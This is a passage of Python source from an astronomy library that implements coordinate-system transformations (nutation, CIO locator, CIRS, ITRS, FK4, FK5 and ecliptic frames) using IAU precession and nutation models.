    :returns: eps,dpsi,deps in radians
    """
    from ..constants import asecperrad
    from ..obstools import epoch_to_jd,jd2000
    from .funcs import obliquity
    if asepoch:
        jd = epoch_to_jd(intime)
    else:
        jd = intime
    # mean obliquity (IAU 2000), in radians
    epsa = np.radians(obliquity(jd,2000))
    # t is Julian centuries from J2000.0
    t = (jd-jd2000)/36525
    #Fundamental (Delaunay) arguments from Simon et al. (1994) via SOFA
    # each is reduced mod 1296000 arcsec (= 360 deg) then converted to radians
    #Mean anomaly of moon
    el = ((485868.249036 + 1717915923.2178*t)%1296000)/asecperrad
    #Mean anomaly of sun
    elp = ((1287104.79305 + 129596581.0481*t)%1296000)/asecperrad
    #Mean argument of the latitude of Moon
    F = ((335779.526232 + 1739527262.8478*t)%1296000)/asecperrad
    #Mean elongation of the Moon from Sun
    D = ((1072260.70369 + 1602961601.2090*t)%1296000)/asecperrad
    #Mean longitude of the ascending node of Moon
    Om = ((450160.398036 + -6962890.5431*t)%1296000)/asecperrad
    #compute nutation series using array loaded from data directory
    dat = _nut_data_00b
    arg = dat.nl*el + dat.nlp*elp + dat.nF*F + dat.nD*D + dat.nOm*Om
    sarg = np.sin(arg)
    carg = np.cos(arg)
    p1uasecperrad = asecperrad*1e7 #0.1 microarcsec per rad
    # lunisolar series sums (coefficients are in 0.1 microarcsec)
    dpsils = np.sum((dat.ps + dat.pst*t)*sarg + dat.pc*carg)/p1uasecperrad
    depsls = np.sum((dat.ec + dat.ect*t)*carg + dat.es*sarg)/p1uasecperrad
    #fixed offset in place of planetary terms
    masecperrad = asecperrad*1e3 #milliarcsec per rad
    dpsipl = -0.135/masecperrad
    depspl = 0.388/masecperrad
    return epsa,dpsils+dpsipl,depsls+depspl #all in radians
def _nutation_matrix(epoch):
    """
    Nutation matrix generated from nutation components.
    Matrix converts from mean coordinate to true coordinate as
    r_true = M * r_mean

    :param epoch: Julian epoch at which to evaluate the nutation
    :returns: a 3x3 rotation matrix
    """
    from ..utils import rotation_matrix
    #TODO: implement higher precision 2006/2000A model if requested/needed
    epsa,dpsi,deps = _nutation_components2000B(epoch) #all in radians
    # Rx(-(epsa+deps)) Rz(-dpsi) Rx(epsa); the False flag means the angles
    # are given in radians rather than degrees
    return rotation_matrix(-(epsa + deps),'x',False) *\
           rotation_matrix(-dpsi,'z',False) *\
           rotation_matrix(epsa,'x',False)
def _load_CIO_locator_data(datafn):
    """
    Loads CIO locator series terms from saved data files.
    returns polycoeffs,termsarr (starting with 0th)

    :param datafn: name of the packaged data file to load
    :returns:
        (polys, orders) where polys is an array of polynomial coefficients and
        orders is a list of (int-coefficient array, sin array, cos array)
        tuples, one per series order
    """
    from ..utils.io import get_package_data
    # drop comment lines and blank lines
    lines = [l for l in get_package_data(datafn).split('\n') if not l.startswith('#') if not l.strip()=='']
    coeffs = []
    sincs = []
    coscs = []
    orders = []
    inorder = False
    for l in lines:
        if 'Polynomial coefficients:' in l:
            # header line listing the comma-separated polynomial coefficients
            # NOTE(review): `polys` stays unbound if this line is absent --
            # the packaged data files are assumed to always contain it
            polys = l.replace('Polynomial coefficients:','').split(',')
            polys = np.array(polys,dtype=float)
        elif 'order' in l:
            # an 'order' line starts a new series block; flush the previous
            # block's accumulated terms first (skipped for the first block)
            if inorder:
                orders.append((np.array(coeffs,dtype=int),
                               np.array(sincs,dtype=float),
                               np.array(coscs,dtype=float)))
                coeffs = []
                sincs = []
                coscs = []
            inorder = True
        elif inorder:
            # term line: 8 integer multipliers, then sin and cos amplitudes
            ls = l.split()
            coeffs.append(ls[:8])
            sincs.append(ls[8])
            coscs.append(ls[9])
    # flush the final block
    if inorder:
        orders.append((np.array(coeffs,dtype=int),
                       np.array(sincs,dtype=float),
                       np.array(coscs,dtype=float)))
    return polys,orders
# IAU 2000 CIO locator (s) series, loaded once at import time
_CIO_locator_data = _load_CIO_locator_data('iau00_cio_locator.tab')
class CIRSCoordinates(EquatorialCoordinatesBase):
    """
    Represents an object as equatorial coordinates in the Celestial Intermediate
    Reference System. This is the post-2000 IAU system for equatorial
    coordinates that separates the coordinate system from the dynamically
    complicated and somewhat imprecisely-defined ideas of the equinox and
    ecliptic. This system's fundamental plane is the equator of the Celestial
    Intermediate Pole (CIP) and the origin of RA is at the Celestial
    Intermediate Origin (CIO).
    Changes to the :attr:`epoch` will result in the coordinates being updated
    for precession nutation. Nutation currently uses the IAU 2000B model that
    should be good to ~1 mas. If aberration or annual parallax corrections are
    necessary, convert to :class:`ICRSCoordinates`, change the epoch, and then
    convert back to :class:`CIRSCoordinates`.
    To convert from these coordinates to :class:`HorizontalCoordinates`
    appropriate for observed coordinates, site information is necessary. Hence,
    the transformations from equatorial to horizontal coordinates are performed
    by the :class:`~astropysics.obstools.Site` class in the
    :mod:`~astropysics.obstools` module, and attempting to directly convert will
    raise an :exc:`TypeError`.
    """
    def transformToEpoch(self,newepoch):
        """
        Transforms these :class:`EquatorialCoordinates` to a new epoch using the
        IAU 2000 precessions from Capitaine, N. et al. 2003 as written in the
        USNO Circular 179.
        """
        if self.epoch is not None and newepoch is not None:
            #undo the current epoch's rotation (transpose == inverse for a
            #real unitary rotation matrix), then apply the new epoch's
            M = self._CMatrix(self.epoch).T
            Mn = self._CMatrix(newepoch)
            self.matrixRotate(Mn*M)
        #this sets the epoch
        EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
    @staticmethod
    def _CMatrix(epoch):
        """
        The GCRS->CIRS transformation matrix
        """
        B = ICRSCoordinates.frameBiasJ2000
        if epoch is None:
            #without an epoch only the fixed frame-bias rotation applies
            return B
        else:
            from math import sin,cos,atan,atan2,sqrt
            from ..utils import rotation_matrix
            P = _precession_matrix_J2000_Capitaine(epoch)
            N = _nutation_matrix(epoch)
            #bottom row of N*P*B is the CIP unit vector (x,y,z) in the GCRS
            x,y,z = (N*P*B).A[2]
            xsq,ysq = x**2,y**2
            bz = 1/(1+z)
            s = CIRSCoordinates._CIOLocator(epoch)
            #matrix components - see Circular 179 or IERS Conventions 2003
            a,b,c = 1-bz*xsq , -bz*x*y , -x
            d,e,f = -bz*x*y , 1 - bz*ysq , -y
            g,h,i = x , y , 1 - bz*(xsq+ysq)
            #return rotation_matrix(-s,'z',degrees=False)*np.mat([[a,b,c],
            #                                                     [d,e,f],
            #                                                     [g,h,i]])
            #the z-rotation by the CIO locator s is multiplied through by hand
            si = sin(s)
            co = cos(s)
            M = [[a*co - d*si,b*co - e*si,c*co - f*si],
                 [a*si + d*co,b*si + e*co,c*si + f*co],
                 [ g, h, i ]]
            return np.mat(M)
            #SOFA implementation using spherical angles - numerically identical
            #r2 = x*x + y*y
            #e = atan2(y,x) if r2 != 0 else 0
            #d = atan(sqrt(r2/(1-r2)))
            #return rotation_matrix(-(e+s),'z',False) *\
            #       rotation_matrix(d,'y',False) *\
            #       rotation_matrix(e,'z',False)
    @staticmethod
    def _CIOLocator(epoch):
        """
        Returns the CIO locator s for the provided epoch. s is the difference in
        RA between the GCRS and CIP points for the ascending node of the CIP
        equator.
        """
        #from ..obstools import jd2000,epoch_to_jd
        from ..constants import asecperrad
        from .ephems import _mean_anomaly_of_moon,_mean_anomaly_of_sun,\
                            _mean_long_of_moon_minus_ascnode,_long_earth,\
                            _mean_elongation_of_moon_from_sun,_long_venus,\
                            _mean_long_asc_node_moon,_long_prec
        #first need to find x and y for the CIP, as s+XY/2 is needed
        B = ICRSCoordinates.frameBiasJ2000
        P = _precession_matrix_J2000_Capitaine(epoch)
        N = _nutation_matrix(epoch)
        #N*P*B takes GCRS to true, so CIP is bottom row
        x,y,z = (N*P*B).A[2]
        #T = (epoch_to_jd(epoch) - jd2000)/36525
        #Julian centuries from J2000
        T = (epoch-2000)/100
        fundargs = [] #fundamental arguments
        fundargs.append(_mean_anomaly_of_moon(T))
        fundargs.append(_mean_anomaly_of_sun(T))
        fundargs.append(_mean_long_of_moon_minus_ascnode(T))
        fundargs.append(_mean_elongation_of_moon_from_sun(T))
        fundargs.append(_mean_long_asc_node_moon(T))
        fundargs.append(_long_venus(T))
        fundargs.append(_long_earth(T))
        fundargs.append(_long_prec(T))
        fundargs = np.array(fundargs)
        polys,orders = _CIO_locator_data
        newpolys = polys.copy() #copy 0-values to add to
        #each polynomial order accumulates a sin/cos series whose arguments
        #are integer combinations (ns) of the fundamental arguments
        for i,o in enumerate(orders):
            ns,sco,cco = o
            a = np.dot(ns,fundargs)
            newpolys[i] += np.sum(sco*np.sin(a) + cco*np.cos(a))
        #polyval wants highest order first, hence [::-1]; result arcsec->rad,
        #and the conventional xy/2 term is removed to give s itself
        return np.polyval(newpolys[::-1],T)/asecperrad - x*y/2.0
    @CoordinateSystem.registerTransform(GCRSCoordinates,'self',transtype='smatrix')
    def _fromGCRS(gcrsc):
        return CIRSCoordinates._CMatrix(gcrsc.epoch)
    @CoordinateSystem.registerTransform('self',GCRSCoordinates,transtype='smatrix')
    def _toGCRS(cirssys):
        #transpose == inverse for the rotation matrix
        return CIRSCoordinates._CMatrix(cirssys.epoch).T
class EquatorialCoordinatesEquinox(EquatorialCoordinatesBase):
    """
    Represents an object in *mean* geocentric apparent equatorial coordinates,
    using the pre-IAU2000 systems where the plane of the ecliptic is the
    fundamental plane and the origin is at the equinox of date (as set by
    :attr:`epoch`).
    Changes to the :attr:`epoch` will result in the coordinates being updated
    for precession, but not nutation, nor annual aberration. Neither are
    planned by the primary author of this package, as IAU 2000 recommends using
    only CIO-based systems, but if someone actually wants equinox-based
    nutation, feel free to implement it and pass it along.
    To convert from these coordinates to :class:`HorizontalCoordinates`
    appropriate for observed coordinates, site information is necessary. Hence,
    the transformations from equatorial to horizontal coordinates are performed
    by the :class:`~astropysics.obstools.Site` class in the
    :mod:`astropysics.obstools` module, and attempting to directly convert will
    raise a :exc:`TypeError`.
    """
    transweight = 1.1 #Equinox-based transforms are to be avoided in favor of CIRS
    __slots__ = tuple()
    def transformToEpoch(self,newepoch):
        """
        Transforms these :class:`EquatorialCoordinates` to a new epoch using the
        IAU 2000 precessions from Capitaine, N. et al. 2003 as written in the
        USNO Circular 179.
        """
        if self.epoch is not None and newepoch is not None:
            #convert from current to J2000
            B = _nutation_matrix(self.epoch) *\
                _precession_matrix_J2000_Capitaine(self.epoch).T
            #transpose==inv; matrix is real unitary
            #convert to new epoch
            A = _nutation_matrix(newepoch) *\
                _precession_matrix_J2000_Capitaine(newepoch)
            self.matrixRotate(A*B)
        #this sets the epoch
        EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
    @CoordinateSystem.registerTransform(GCRSCoordinates,'self',transtype='smatrix')
    def _fromGCRS(gcrsc):
        #frame bias, followed by precession and nutation for the epoch
        B = ICRSCoordinates.frameBiasJ2000
        if gcrsc.epoch is None:
            return B
        else:
            P = _precession_matrix_J2000_Capitaine(gcrsc.epoch)
            N = _nutation_matrix(gcrsc.epoch)
            return N*P*B
    @CoordinateSystem.registerTransform('self',GCRSCoordinates,transtype='smatrix')
    def _toGCRS(eqsys):
        #transpose == inverse for the rotation matrix
        return EquatorialCoordinatesEquinox._fromGCRS(eqsys).T
    @CoordinateSystem.registerTransform('self',CIRSCoordinates,transtype='smatrix')
    def _toCIRS(eqsys):
        if eqsys.epoch is None:
            return np.eye(3).view(np.matrix)
        else:
            from ..obstools import epoch_to_jd
            from .funcs import equation_of_the_origins
            from ..utils import rotation_matrix
            jd = epoch_to_jd(eqsys.epoch)
            #the equinox origin and the CIO differ by the equation of the
            #origins, a rotation about the pole (z) axis
            eqo = equation_of_the_origins(jd)*15. #hours>degrees
            return rotation_matrix(-eqo,'z',True)
    @CoordinateSystem.registerTransform(CIRSCoordinates,'self',transtype='smatrix')
    def _fromCIRS(cirssys):
        #transpose == inverse for the rotation matrix
        return EquatorialCoordinatesEquinox._toCIRS(cirssys).T
class ITRSCoordinates(EpochalLatLongCoordinates):
    """
    Coordinates based on the International Terrestrial Reference System. The
    particular implementation here assumes ITRS matches the WGS84 coordinates
    (used by GPS) - for astronomical purposes, this is a perfectly good
    assumption.
    Epoch transformations in this system only adjust for polar motion - to
    account for earth rotation, transform back to
    :class:`CIRSCoordinates` or :class:`EquatorialCoordinatesEquinox`,
    change the epoch, then transform back to :class:`ITRSCoordinates`.
    Because polar motion is not fully predictable, a number of methods are
    available for approximating it. To choose a method, set the
    :attr:`ITRSCoordinates.polarmotion` class attribute -- this will also affect
    all future transformations to :class:`ITRSCoordinates` from other coordinate
    systems. The following are valid values:

    * None
        Assumes the pole locations are fixed to the CIP at all times, aside
        from the tiny effect of s' (the TIO-CIO shift).
    * A 2-tuple of callables (xp,yp)
        They will be called as xp(epoch) and yp(epoch) and the result will
        be assumed to give the x and y coordinates of the poles in the CIP
        frame.

    .. note::
        The transformations from CIRS and Equinox systems to ITRS technically
        involve converting to TIRS (the Terrestrial Intermediate Reference
        System), distinguished from ITRS by no polar motion correction. While
        there is no class explicitly representing TIRS, ITRS with :attr:`epoch`
        set to None is equivalent to TIRS.
    """
    #BUGFIX: was ``tuple('_dpc')``, which expands to ('_','d','p','c') - the
    #intent is clearly a single slot named '_dpc'
    __slots__ = ('_dpc',)
    #_dpc is included for transformation to/from Equatorial-like systems
    _longrange_ = (-180,180)
    polarmotion = None
    """
    Technique of computing poles (see :class:`ITRSCoordinates` documentation)
    """
    @staticmethod
    def _TIOLocator(epoch):
        """
        s-prime, the offset between the 0 of longitude for the CIO of CIRS and
        the TIO of TIRS (Terrestrial Intermediate Reference System) - TIRS and
        ITRS differ by polar motion. Return value in radians.
        This is really, really small, and isn't really necessary except for
        completeness.
        """
        from ..constants import asecperrad
        T = (epoch-2000)/100
        #linear model: s' = -47 microarcseconds per Julian century
        return -47e-6*T/asecperrad
    @staticmethod
    def _WMatrix(epoch):
        """
        The polar-motion ("wobble") rotation matrix for the given epoch,
        built from the configured :attr:`polarmotion` technique.
        """
        from ..utils import rotation_matrix
        sp = ITRSCoordinates._TIOLocator(epoch)
        if ITRSCoordinates.polarmotion is None:
            xp = 0
            yp = 0
        else: #assume 2-sequence (xp,yp)
            xp,yp = ITRSCoordinates.polarmotion
            if callable(xp):
                xp = xp(epoch)
            if callable(yp):
                yp = yp(epoch)
        #TODO: test if the following, linear matrix is good enough to not
        #bother with the "right" one:
        #[[1,-sp,-xp],
        # [sp,1,yp],
        # [xp,-yp,1]] #can also do sp->0
        return rotation_matrix(-yp,'x') *\
               rotation_matrix(-xp,'y') *\
               rotation_matrix(sp,'z')
    def transformToEpoch(self,newepoch):
        """
        Transforms these :class:`ITRSCoordinates` to a new epoch, adjusting the
        coordinate values for polar motion.
        """
        if self.epoch is not None and newepoch is not None:
            #transpose == inverse for a real unitary rotation matrix
            M = self._WMatrix(self.epoch).T
            Mn = self._WMatrix(newepoch)
            self.matrixRotate(Mn*M)
        #this sets the epoch
        EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
    @add_docs(EpochalLatLongCoordinates.convert)
    def convert(self,tosys,optimize=_convertoptimizedefault):
        ''
        res = EpochalLatLongCoordinates.convert(self,tosys,optimize)
        #carry the distance through the conversion when it is present
        if self._dpc is not None:
            res._dpc = self._dpc
        return res
    @CoordinateSystem.registerTransform(CIRSCoordinates,'self',transtype='smatrix')
    def _fromEqC(eqc):
        from .funcs import earth_rotation_angle
        from ..obstools import epoch_to_jd
        from ..utils import rotation_matrix
        epoch = eqc.epoch
        if epoch is not None:
            jd = epoch_to_jd(eqc.epoch)
            #spin by the earth rotation angle, then apply polar motion
            era = earth_rotation_angle(jd,degrees=True)
            W = ITRSCoordinates._WMatrix(eqc.epoch)
            return W*rotation_matrix(era)
        else:
            #epochless coordinates are treated as TIRS -> identity
            return np.eye(3).view(np.matrix)
    @CoordinateSystem.registerTransform(EquatorialCoordinatesEquinox,'self',transtype='smatrix')
    def _fromEqE(eqe):
        from .funcs import greenwich_sidereal_time
        from ..utils import rotation_matrix
        from ..obstools import epoch_to_jd
        epoch = eqe.epoch
        if epoch is not None:
            jd = epoch_to_jd(eqe.epoch)
            try:
                gst = greenwich_sidereal_time(jd,True)*15. #hours -> degrees
            except Exception as e:
                #FIX: was the Python 2-only ``except Exception,e`` syntax;
                #``as`` works on Python >= 2.6 and Python 3
                from warnings import warn
                warn('temporarily bypassing problem with greenwich_sidereal_time:%s'%e)
                gst = greenwich_sidereal_time(jd,'simple')*15. #hours -> degrees
            W = ITRSCoordinates._WMatrix(eqe.epoch)
            return W*rotation_matrix(gst)
        else:
            return np.eye(3).view(np.matrix)
    @CoordinateSystem.registerTransform('self',CIRSCoordinates,transtype='smatrix')
    def _toEqC(itrsc):
        #really we want inverse, but rotations are unitary -> inv==transpose
        #we provide itrsc in the call because the epoch is needed
        return ITRSCoordinates._fromEqC(itrsc).T
    @CoordinateSystem.registerTransform('self',EquatorialCoordinatesEquinox,transtype='smatrix')
    def _toEqE(itrsc):
        #really we want inverse, but rotations are unitary -> inv==transpose
        #we provide itrsc in the call because the epoch is needed
        return ITRSCoordinates._fromEqE(itrsc).T
class FK5Coordinates(EquatorialCoordinatesEquinox):
    """
    Equatorial Coordinates fixed to the FK5 reference system.
    """
    __slots__ = tuple()
    @staticmethod
    def _precessionMatrixJ(epoch1,epoch2):
        """
        Computes the precession matrix from one Julian epoch to another
        """
        from ..utils import rotation_matrix
        #Julian centuries of epoch1 from J2000, and from epoch1 to epoch2
        T = (epoch1 - 2000)/100
        dt = (epoch2 - epoch1)/100
        #polynomial coefficients for the equatorial precession angle zeta,
        #listed highest-order first with the leading linear term (arcsec) last
        pzeta = (0.017998,0.000344,0.30188,-0.000139,1.39656,2306.2181)
        temp = pzeta[5] + T*(pzeta[4]+T*pzeta[3])
        zeta = dt*(temp + dt*((pzeta[2]+pzeta[1]*T) + dt*pzeta[0]))/3600
        #z shares zeta's linear term, hence the reuse of `temp` here
        pz = (0.018203,-0.000066,1.09468)
        z = dt*(temp + dt*((pz[2]+pz[1]*T) + dt*pz[0]))/3600
        ptheta = (-0.041833,-0.000217,-0.42665,-0.000217,-0.85330,2004.3109)
        temp = ptheta[5] + T*(ptheta[4]+T*ptheta[3])
        theta = dt*(temp + dt*((ptheta[2]+ptheta[1]*T) + dt*ptheta[0]))/3600
        #angles are in degrees (arcsec/3600); standard z-y-z rotation sequence
        return rotation_matrix(-z,'z') *\
               rotation_matrix(theta,'y') *\
               rotation_matrix(-zeta,'z')
    def transformToEpoch(self,newepoch):
        """
        Transforms these :class:`EquatorialCoordinates` to a new epoch. Uses the
        algorithm resolved by the IAU in 1976 as written in Meeus, as well as
        Lieske, J.H. 1979.
        According to SOFA, this formulation becomes less valid at the following
        levels:
        * 1960 CE to 2040 CE
            < 0.1"
        * 1640 CE to 2360 CE
            < 1"
        * 500 BCE to 3000 CE
            < 3"
        * 1200 BCE to 3900 CE
            > 10"
        * 4200 BCE to 5600 CE
            > 100"
        * 6800 BCE to 8200 CE
            > 1000"
        """
        if self.epoch is not None and newepoch is not None:
            self.matrixRotate(self._precessionMatrixJ(self.epoch,newepoch))
        #this sets the epoch
        EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
    @CoordinateSystem.registerTransform(ICRSCoordinates,'self',transtype='smatrix')
    def _fromICRS(icrsc):
        """
        B-matrix from USNO circular 179
        """
        from ..utils import rotation_matrix
        #ICRS->FK5 frame bias angles in degrees (values are milliarcseconds)
        eta0 = -19.9/3600000
        xi0 = 9.1/3600000
        da0 = -22.9/3600000
        B = rotation_matrix(-eta0,'x') *\
            rotation_matrix(xi0,'y') *\
            rotation_matrix(da0,'z')
        epoch = icrsc.epoch
        if icrsc.epoch is None:
            return B
        else:
            #after the fixed bias, precess from J2000 to the coordinate epoch
            return FK5Coordinates._precessionMatrixJ(2000,icrsc.epoch)*B
    @CoordinateSystem.registerTransform('self',ICRSCoordinates,transtype='smatrix')
    def _toICRS(fk5c):
        #transpose == inverse for the rotation matrix
        return FK5Coordinates._fromICRS(fk5c).T
class FK4Coordinates(EquatorialCoordinatesEquinox):
    """
    Equatorial Coordinates fixed to the FK4 reference system. Note that this
    implementation does *not* correct for the elliptic terms of aberration
    as of yet.
    Epoch is Besselian.
    """
    __slots__ = tuple()
    julianepoch = False
    def __init__(self,*args,**kwargs):
        """
        Input for FK4 coordinates. Can follow any of the following forms:
        * EquatorialCoordinatesBase()
        * EquatorialCoordinatesBase(:class:`EquatorialCoordinatesBase`)
        * EquatorialCoordinatesBase('rastr decstr')
        * EquatorialCoordinatesBase((ra,dec))
        * EquatorialCoordinatesBase(ra,dec)
        * EquatorialCoordinatesBase(ra,fdec,raerr,decerr)
        * EquatorialCoordinatesBase(ra,dec,raerr,decerr,epoch)
        * EquatorialCoordinatesBase(ra,dec,raerr,decerr,epoch,distancepc)
        The epoch of FK4 coordinates defaults to B1950.
        """
        #delegate all argument parsing to the base class, passing self
        #explicitly so *args can be forwarded untouched
        args = list(args)
        args.insert(0,self)
        EquatorialCoordinatesEquinox.__init__(*args,**kwargs)
        #the base class defaults the epoch to 2000; FK4 defaults to B1950
        if self._epoch==2000.:
            self._epoch = 1950.
    def transformToEpoch(self,newepoch):
        """
        Transforms these :class:`EquatorialCoordinates` to a new epoch. Uses the
        method of Newcomb (pre-IAU1976) to compute precession.
        """
        if self.epoch is not None and newepoch is not None:
            self.matrixRotate(self._precessionMatrixB(self.epoch,newepoch))
        #this sets the epoch
        EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
    @staticmethod
    def _precessionMatrixB(epoch1,epoch2):
        """
        computes the precession matrix from one Besselian epoch to another using
        Newcomb's method.
        """
        from ..utils import rotation_matrix
        #tropical years
        t1 = (epoch1-1850.0)/1000.0
        t2 = (epoch2-1850.0)/1000.0
        dt = t2 - t1
        #Newcomb's precession-angle polynomials in dt; coefficients are in
        #arcseconds (the /3600 converts to degrees), and zeta and z share the
        #same first-order term
        zeta1 = 23035.545 + t1*139.720+0.060*t1*t1
        zeta2 = 30.240 - 0.27*t1
        zeta3 = 17.995
        pzeta = (zeta3,zeta2,zeta1,0)
        zeta = np.polyval(pzeta,dt)/3600
        z1 = 23035.545 + t1*139.720 + 0.060*t1*t1
        z2 = 109.480 + 0.39*t1
        z3 = 18.325
        pz = (z3,z2,z1,0)
        z = np.polyval(pz,dt)/3600
        theta1 = 20051.12 - 85.29*t1 - 0.37*t1*t1
        theta2 = -42.65 - 0.37*t1
        theta3 = -41.8
        ptheta = (theta3,theta2,theta1,0)
        theta = np.polyval(ptheta,dt)/3600
        #standard z-y-z rotation sequence for equatorial precession
        return rotation_matrix(-z,'z') *\
               rotation_matrix(theta,'y') *\
               rotation_matrix(-zeta,'z')
    @CoordinateSystem.registerTransform('self',FK5Coordinates,transtype='smatrix')
    def _toFK5(fk4c):
        from ..obstools import epoch_to_jd,jd_to_epoch
        #B1950->J2000 matrix from Murray 1989 A&A 218,325
        B = np.mat([[0.9999256794956877,-0.0111814832204662,-0.0048590038153592],
                    [0.0111814832391717,0.9999374848933135,-0.0000271625947142],
                    [0.0048590037723143,-0.0000271702937440,0.9999881946023742]])
        if fk4c.epoch is not None and fk4c.epoch != 1950:
            #convert the Besselian epoch to its Julian equivalent to get the
            #centuries-since-1950 factor for the rotation corrections
            jd = epoch_to_jd(fk4c.epoch,False)
            jepoch = jd_to_epoch(jd)
            T = (jepoch - 1950)/100
            #now add in correction terms for FK4 rotating system
            B[0,0] += -2.6455262e-9*T
            B[0,1] += -1.1539918689e-6*T
            B[0,2] += 2.1111346190e-6*T
            B[1,0] += 1.1540628161e-6*T
            B[1,1] += -1.29042997e-8*T
            B[1,2] += 2.36021478e-8*T
            B[2,0] += -2.1112979048e-6*T
            B[2,1] += -5.6024448e-9*T
            B[2,2] += 1.02587734e-8*T
            #precess within FK4 to B1950 before applying Murray's matrix
            PB = FK4Coordinates._precessionMatrixB(fk4c.epoch,1950)
            return B*PB
        else:
            return B
    @CoordinateSystem.registerTransform(FK5Coordinates,'self',transtype='smatrix')
    def _fromFK5(fk5c):
        #need inverse because Murray's matrix is *not* a true rotation matrix
        return FK4Coordinates._toFK5(fk5c).I
class EclipticCoordinatesCIRS(EpochalLatLongCoordinates):
    """
    Ecliptic Coordinates (beta, lambda) such that the fundamental plane passes
    through the ecliptic at the current epoch.
    Note that because the concept of the ecliptic can be complicated or even
    ill-defined, ecliptic coordinates in astropysics are simply defined as
    tied to a particular set of equatorial coordinates with a given obliquity
    model. For :class:`EclipticCoordinatesCIRS`, the equatorial
    coordinates are :class:`CIRSCoordinates` with obliquity
    given by the IAU 2006 obliquity model (see :func:`obliquity`)
    """
    __slots__ = ()
    _longlatnames_ = ('lamb','beta')
    _longrange_ = (0,360)
    #year of the obliquity model used by the transforms below
    obliqyear = 2006
    def __init__(self,lamb=0,beta=0,lamberr=None,betaerr=None,epoch=2000,
                      distanceau=None):
        """
        See the associated attribute docstrings for the meaning of the inputs.
        """
        EpochalLatLongCoordinates.__init__(self,lamb,beta,lamberr,betaerr,epoch)
        self.distanceau = distanceau
    @CoordinateSystem.registerTransform('self',CIRSCoordinates,transtype='smatrix')
    def _toEq(eclsc):
        #rotate back up from the ecliptic to the equatorial plane
        from .funcs import obliquity
        from ..utils import rotation_matrix
        return rotation_matrix(-obliquity(eclsc.jdepoch,EclipticCoordinatesCIRS.obliqyear),'x')
    @CoordinateSystem.registerTransform(CIRSCoordinates,'self',transtype='smatrix')
    def _fromEq(eqc):
        #tilt the equatorial frame down to the ecliptic by the obliquity
        from .funcs import obliquity
        from ..utils import rotation_matrix
        return rotation_matrix(obliquity(eqc.jdepoch,EclipticCoordinatesCIRS.obliqyear),'x')
    def transformToEpoch(self,newepoch):
        """
        Transforms to a new epoch by round-tripping through
        :class:`CIRSCoordinates`, which handles the precession-nutation.
        """
        if self.epoch is not None and newepoch is not None:
            eqc = self.convert(CIRSCoordinates)
            eqc.epoch = newepoch
            newval = eqc.convert(self.__class__)
            self._lat._decval = newval._lat._decval
            self._long._decval = newval._long._decval
            #BUGFIX: previously copied newval._lat (the latitude *value*)
            #into self._laterr; the latitude error is the correct source
            self._laterr._decval = newval._laterr._decval
            self._longerr._decval = newval._longerr._decval
        #this sets the epoch
        EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
class EclipticCoordinatesEquinox(EpochalLatLongCoordinates):
    """
    Ecliptic Coordinates (beta, lambda) such that the fundamental plane passes
    through the ecliptic at the current epoch.
    Note that because the concept of the ecliptic can be complicated or even
    ill-defined, ecliptic coordinates in astropysics are simply defined as tied
    to a particular set of equatorial coordinates with a given obliquity model.
    For :class:`EclipticCoordinatesEquinox`, the equatorial coordinates are
    :class:`EquatorialCoordinatesEquinox` with obliquity given by the IAU 1980
    obliquity model (see :func:`~astropysics.coords.funcs.obliquity`)
    """
    __slots__ = ()
    _longlatnames_ = ('lamb','beta')
    _longrange_ = (0,360)
    #year of the obliquity model used by the transforms below
    obliqyear = 1980
    def __init__(self,lamb=0,beta=0,lamberr=None,betaerr=None,epoch=2000,
                      distanceau=None):
        """
        See the associated attribute docstrings for the meaning of the inputs.
        """
        EpochalLatLongCoordinates.__init__(self,lamb,beta,lamberr,betaerr,epoch)
        self.distanceau = distanceau
    @CoordinateSystem.registerTransform('self',EquatorialCoordinatesEquinox,transtype='smatrix')
    def _toEq(eclsc):
        #rotate back up from the ecliptic to the equatorial plane
        from .funcs import obliquity
        from ..utils import rotation_matrix
        return rotation_matrix(-obliquity(eclsc.jdepoch,EclipticCoordinatesEquinox.obliqyear),'x')
    @CoordinateSystem.registerTransform(EquatorialCoordinatesEquinox,'self',transtype='smatrix')
    def _fromEq(eqc):
        #tilt the equatorial frame down to the ecliptic by the obliquity
        from .funcs import obliquity
        from ..utils import rotation_matrix
        return rotation_matrix(obliquity(eqc.jdepoch,EclipticCoordinatesEquinox.obliqyear),'x')
    def transformToEpoch(self,newepoch):
        """
        Transforms to a new epoch by round-tripping through
        :class:`EquatorialCoordinatesEquinox`, which handles the precession.
        """
        if self.epoch is not None and newepoch is not None:
            eqc = self.convert(EquatorialCoordinatesEquinox)
            eqc.epoch = newepoch
            newval = eqc.convert(self.__class__)
            self._lat._decval = newval._lat._decval
            self._long._decval = newval._long._decval
            #BUGFIX: previously copied newval._lat (the latitude *value*)
            #into self._laterr; the latitude error is the correct source
            self._laterr._decval = newval._laterr._decval
            self._longerr._decval = newval._longerr._decval
        #this sets the epoch
        EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
class RectangularGeocentricEclipticCoordinates(RectangularCoordinates,EpochalCoordinates):
    """
    Rectangular coordinates oriented so that the x-y plane lies in the plane of
    the ecliptic at the specified epoch. Distances are in AU. Origin is at the
    center of mass of the Earth.
    Note that the epoch should not be set directly - if precession is
    desired, convert to an Ecliptic coordinate system, do the precession, and
    convert back.
    """
    __slots__ = tuple()
    julianepoch = True
    def __init__(self,x,y,z,epoch=None):
        RectangularCoordinates.__init__(self,x,y,z)
        self._epoch = epoch
    def __getstate__(self):
        #merge pickling state from both parent classes
        d = RectangularCoordinates.__getstate__(self)
        d.update(EpochalCoordinates.__getstate__(self))
        return d
    def __setstate__(self,d):
        RectangularCoordinates.__setstate__(self,d)
        EpochalCoordinates.__setstate__(self,d)
    def __str__(self):
        if self.epoch is None:
            epochstr = ''
        else:
            epochstr = ' ('+self.epochstr+')'
        return RectangularCoordinates.__str__(self) + epochstr
    def transformToEpoch(self,newepoch):
        #BUGFIX: was ``EpochalCoordinates.transformToEpoch(newepoch)`` - the
        #unbound call was missing ``self``, so newepoch was bound as self
        EpochalCoordinates.transformToEpoch(self,newepoch)
    @CoordinateSystem.registerTransform('self',EclipticCoordinatesCIRS)
    def _toEcC(rec):
        #cartesian -> spherical (lambda, beta, r)
        from math import asin,atan2,degrees
        x,y,z = rec.x,rec.y,rec.z
        r = (x*x+y*y+z*z)**0.5
        beta = degrees(asin(z/r))
